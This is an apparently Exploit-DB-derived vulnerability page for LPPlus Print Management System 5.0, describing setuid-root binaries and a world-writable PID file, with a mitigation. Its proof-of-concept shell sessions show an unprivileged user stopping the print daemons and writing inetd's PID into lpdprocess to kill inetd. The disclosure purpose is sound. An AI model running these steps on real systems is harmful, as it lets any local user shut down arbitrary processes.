header-logo
Suggest Exploit
vendor:
LPPlus Print Management System
by:
SecurityFocus
7.2
CVSS
HIGH
Privilege Escalation, Denial of Service
264
CWE
Product Name: LPPlus Print Management System
Affected Version From: LPPlus Print Management System 5.0
Affected Version To: LPPlus Print Management System 5.0
Patch Exists: YES
Related CWE: CVE-2002-0753
CPE: a:lpplus:lpplus_print_management_system
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2002

LPPlus Print Management System Vulnerabilities

LPPlus Print Management System contains several files that are installed setuid root by default. These files include dccsched, dcclpdser and dccbkst which start the scheduler, LPD server and network status daemons respectively. By default, all six may be run by a user of any privilege level, allowing any user to start and stop printing services, regardless of userid or group. Additionally, the file $LPHOME/system/lpdprocess is created mode 777. This file contains the process ID of the dcclpdser process. If a user replaces the PID in $LPHOME/system/lpdprocess with the PID of a target process, then runs $LPHOME/bin/dcclpdshut, the combination of this file's permissions, and the fact that dcclpdshut is executable by any user, allows any user to send signal 2 (SIGINT) to, thereby shutting down, any process.

Mitigation:

Ensure that the files dccsched, dcclpdser and dccbkst are not setuid root and that the file $LPHOME/system/lpdprocess is not set to mode 777.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/1643/info

Vulnerability #1: Several files that are part of the LPPlus print management system are installed setuid root by default. These files include:

$LPHOME/bin/dccsched 
$LPHOME/bin/dcclpdser 
$LPHOME/bin/dccbkst 

These start the scheduler, LPD server and network status daemons.

$LPHOME/bin/dccshut 
$LPHOME/bin/dcclpdshut 
$LPHOME/bin/dccbkstshut

These stop the same services.

By default, all six may be run by a user of any privilege level, allowing any user to start and stop printing services, regardless of userid or group.

Vulnerability #2: $LPHOME/system/lpdprocess is created mode 777. This file contains the process ID of the dcclpdser process. If a user replaces the PID in $LPHOME/system/lpdprocess with the PID of a target process, then runs $LPHOME/bin/dcclpdshut, the combination of this file's permissions, and the fact that dcclpdshut is executable by any user, allows any user to send signal 2 (SIGINT) to, thereby shutting down, any process.

Vulnerability #1: 

$ id
uid=600(test) gid=300(users)
$ ps -ef|grep dcc
test 26357 26351 0 18:18:06 pts/0 0:00 grep dcc
root 26262 1 0 17:41:50 ? 0:01 /opt/lpplus/bin/dccsched
root 26272 1 0 17:42:03 ? 0:00 /opt/lpplus/bin/dcclpdser
root 26276 1 0 17:42:14 ? 0:00 /opt/lpplus/bin/dccbkst
$ dccbkstshut
$ dcclpdshut
LPD048E Signal sent to dcclpdser to shut down.
$ dccshut
LPP054I LP Plus scheduler ordered to shutdown.
$ ps -ef|grep dcc 
test 26253 26239 0 17:39:45 pts/0 0:00 grep dcc 
$

Vulnerability #2

$ id
uid=600(test) gid=300(users)
$ ps -ef|grep inet
test 26285 26279 0 17:42:42 pts/0 0:00 grep inet
root 12276 1 0 Aug 22 ? 0:00 /usr/sbin/inetd -s
$ cat > $LPHOME/system/lpdprocess
12276
^D
$ dcclpdshut
LPD048E Signal sent to dcclpdser to shut down.
$ ps -ef|grep inet
test 26291 26279 0 17:45:17 pts/0 0:00 grep inet
$

Navigation

Suggest Exploit

Services By CQR